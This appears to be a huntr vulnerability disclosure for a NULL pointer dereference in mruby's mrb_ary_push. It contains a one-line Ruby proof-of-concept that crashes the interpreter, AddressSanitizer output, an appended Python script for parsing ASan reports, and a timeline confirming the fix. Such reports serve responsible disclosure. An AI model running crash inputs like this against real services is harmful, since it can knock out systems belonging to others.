NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Oct 17th 2021


Description

SEGV (NULL pointer dereference: a READ from the zero page, address 0x11) in mrb_ary_push at src/array.c:497, reached from mrb_vm_exec while running the one-line script below.

Proof of Concept

1.times{ 0 [*0,o:0 ]= {} [[]] and 0 }

Result

~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==68494==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x560ae5baa377 bp 0x7ffdc8f38fe0 sp 0x7ffdc8f38f30 T0)
==68494==The signal is caused by a READ memory access.
==68494==Hint: address points to the zero page.
    #0 0x560ae5baa376 in mrb_ary_push /root/asan/mruby/src/array.c:497
    #1 0x560ae5b7eb4e in mrb_vm_exec /root/asan/mruby/src/vm.c:2624
    #2 0x560ae5b5c5a8 in mrb_vm_run /root/asan/mruby/src/vm.c:1070
    #3 0x560ae5ba5574 in mrb_top_run /root/asan/mruby/src/vm.c:3031
    #4 0x560ae5bfebfd in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6868
    #5 0x560ae5bfeeeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
    #6 0x560ae5b00092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #7 0x7f09cba160b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #8 0x560ae5afd42d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/array.c:497 in mrb_ary_push
==68494==ABORTING
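As an added example (not part of this huntr report or of the mruby project), the following Python triage helper parses an AddressSanitizer DEADLYSIGNAL report like the one above and classifies it: it pulls out the error kind, the faulting address, the access direction, the stack frames and the SUMMARY line, and flags a SEGV whose address lies inside the first page as a NULL pointer dereference (ASan's own "address points to the zero page" hint). The sample input is the report quoted on this page, embedded so the script runs offline; the 4 KiB zero-page threshold (`ZERO_PAGE_LIMIT`) is an assumption matching the usual x86-64 page size.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input: the ASan report quoted in this huntr report, embedded inline
# so the parser runs offline (this is not a live run of mruby).
ASAN_REPORT = """\
AddressSanitizer:DEADLYSIGNAL
=================================================================
==68494==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x560ae5baa377 bp 0x7ffdc8f38fe0 sp 0x7ffdc8f38f30 T0)
==68494==The signal is caused by a READ memory access.
==68494==Hint: address points to the zero page.
    #0 0x560ae5baa376 in mrb_ary_push /root/asan/mruby/src/array.c:497
    #1 0x560ae5b7eb4e in mrb_vm_exec /root/asan/mruby/src/vm.c:2624
    #2 0x560ae5b5c5a8 in mrb_vm_run /root/asan/mruby/src/vm.c:1070
    #3 0x560ae5ba5574 in mrb_top_run /root/asan/mruby/src/vm.c:3031
    #4 0x560ae5bfebfd in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6868
    #5 0x560ae5bfeeeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
    #6 0x560ae5b00092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #7 0x7f09cba160b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #8 0x560ae5afd42d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/array.c:497 in mrb_ary_push
==68494==ABORTING
"""

# Assumption: a 4 KiB first page; ASan's "zero page" hint refers to this range.
ZERO_PAGE_LIMIT = 0x1000

ERROR_RE = re.compile(
    r"==\d+==ERROR: AddressSanitizer: (?P<kind>\S+) on (?:unknown )?address (?P<addr>0x[0-9a-fA-F]+)"
)
ACCESS_RE = re.compile(r"The signal is caused by a (?P<access>READ|WRITE) memory access")
FRAME_RE = re.compile(r"^\s*#(?P<idx>\d+) 0x[0-9a-fA-F]+ in (?P<func>\S+) (?P<loc>\S+)")
SUMMARY_RE = re.compile(r"^SUMMARY: AddressSanitizer: \S+ (?P<loc>\S+) in (?P<func>\S+)")


@dataclass
class Frame:
    index: int
    function: str
    location: str  # "file:line" for symbolized frames, "(module+offset)" otherwise


@dataclass
class AsanCrash:
    error_kind: str            # e.g. "SEGV", "heap-buffer-overflow"
    address: int               # faulting address from the ERROR line
    access: Optional[str]      # "READ" / "WRITE" when ASan reports it
    frames: List[Frame]
    summary_location: Optional[str]

    @property
    def faulting_frame(self) -> Optional[Frame]:
        # Frame #0 is the instruction that faulted; no sanitizer runtime frames
        # appear in a DEADLYSIGNAL report, so it is the frame to triage.
        return self.frames[0] if self.frames else None

    def classify(self) -> str:
        # A SEGV on an address inside the first page means the program
        # dereferenced NULL (possibly plus a small struct-field offset).
        if self.error_kind == "SEGV" and self.address < ZERO_PAGE_LIMIT:
            return "null-pointer-dereference"
        if self.error_kind == "SEGV":
            return "wild-pointer-access"
        return self.error_kind


def parse_asan_report(text: str) -> AsanCrash:
    """Parse an ASan report; raises ValueError when no ERROR line is present."""
    kind = addr = access = summary_location = None
    frames: List[Frame] = []
    for line in text.splitlines():
        if (m := ERROR_RE.search(line)) and kind is None:
            kind, addr = m["kind"], int(m["addr"], 16)
        elif m := ACCESS_RE.search(line):
            access = m["access"]
        elif m := FRAME_RE.match(line):
            frames.append(Frame(int(m["idx"]), m["func"], m["loc"]))
        elif m := SUMMARY_RE.match(line):
            summary_location = m["loc"]
    if kind is None or addr is None:
        raise ValueError("not an AddressSanitizer error report")
    return AsanCrash(kind, addr, access, frames, summary_location)


if __name__ == "__main__":
    crash = parse_asan_report(ASAN_REPORT)
    top = crash.faulting_frame
    print(f"{crash.classify()} ({crash.access} at {crash.address:#x}) in "
          f"{top.function} at {top.location}")
```

Running it against the report above yields `null-pointer-dereference (READ at 0x11) in mrb_ary_push at /root/asan/mruby/src/array.c:497`, which is the one-line triage record a fuzzing pipeline would file, dedupe on (function plus file:line) and hand to the maintainer; the SUMMARY line is parsed separately as a cross-check against frame #0.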
We have contacted a member of the mruby team and are waiting to hear back a month ago
Yukihiro "Matz" Matsumoto validated this vulnerability a month ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on de2b4b a month ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty